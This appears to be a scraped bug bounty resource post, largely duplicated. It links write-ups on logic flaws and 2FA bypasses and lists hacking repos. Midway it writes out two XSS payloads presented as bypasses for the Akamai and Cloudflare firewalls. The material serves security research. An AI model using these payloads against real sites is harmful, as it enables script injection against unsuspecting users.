Hunting Tips.pdf
155.2 KB
Collection of #bugbountytips (from Twitter, Facebook,Portswigger,Medium..etc)
https://github.com/Ma4xSec/Hunting-Tips/blob/master/Hunting%20Tips.md
https://github.com/Ma4xSec/Hunting-Tips/blob/master/Hunting%20Tips.md
Logic flaw
https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835
https://medium.com/@ritishkumarsingh/facebook-vulnerability-hidden-community-manager-in-pages-due-to-invitation-accept-logic-61ddbe229c97
https://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924
https://noobe.io/articles/2020-01/how-i-found-bug-google-search-console
https://medium.com/@raushanraj_65039/adding-a-malicious-notebook-to-be-treated-like-a-trusted-notebook-in-google-colab-1337-b84353a9f77
https://medium.com/@jbgrunewald/how-i-made-7500-from-my-first-bug-bounty-found-on-google-cloud-platform-1a5415d7569b
https://medium.com/nassec-cybersecurity-writeups/this-is-how-i-got-xxxx-from-facebook-for-instagram-bug-aaff50342246
https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
https://medium.com/bugbountywriteup/bypassing-the-fix-of-my-previous-instagram-bug-49ece4ea7e1d
https://medium.com/@naufalseptiadi/live-video-facebook-application-android-its-not-expired-when-log-out-the-device-on-4d4e0b67b362
#bugbounty #bugbountytips
https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835
https://medium.com/@ritishkumarsingh/facebook-vulnerability-hidden-community-manager-in-pages-due-to-invitation-accept-logic-61ddbe229c97
https://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924
https://noobe.io/articles/2020-01/how-i-found-bug-google-search-console
https://medium.com/@raushanraj_65039/adding-a-malicious-notebook-to-be-treated-like-a-trusted-notebook-in-google-colab-1337-b84353a9f77
https://medium.com/@jbgrunewald/how-i-made-7500-from-my-first-bug-bounty-found-on-google-cloud-platform-1a5415d7569b
https://medium.com/nassec-cybersecurity-writeups/this-is-how-i-got-xxxx-from-facebook-for-instagram-bug-aaff50342246
https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
https://medium.com/bugbountywriteup/bypassing-the-fix-of-my-previous-instagram-bug-49ece4ea7e1d
https://medium.com/@naufalseptiadi/live-video-facebook-application-android-its-not-expired-when-log-out-the-device-on-4d4e0b67b362
#bugbounty #bugbountytips
Bug Bounty Tips:
Akamai XSS Bypass: “><svg/on</script>laod=alert>
Cloudflare XSS Bypass: <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Akamai XSS Bypass: “><svg/on</script>laod=alert>
Cloudflare XSS Bypass: <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Useful GitHub Repos :
1. Book of Secret Knowledge = https://lnkd.in/fWKCdi4
2. Awesome Hacking = https://lnkd.in/f7VPTEX
3. Awesome Bug Bounty = https://lnkd.in/fPrQiVD
4. Awesome Penetration Testing = https://lnkd.in/fAUZgu5
5. Awesome Web Hacking = https://lnkd.in/f5n2hSd
1. Book of Secret Knowledge = https://lnkd.in/fWKCdi4
2. Awesome Hacking = https://lnkd.in/f7VPTEX
3. Awesome Bug Bounty = https://lnkd.in/fPrQiVD
4. Awesome Penetration Testing = https://lnkd.in/fAUZgu5
5. Awesome Web Hacking = https://lnkd.in/f5n2hSd
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn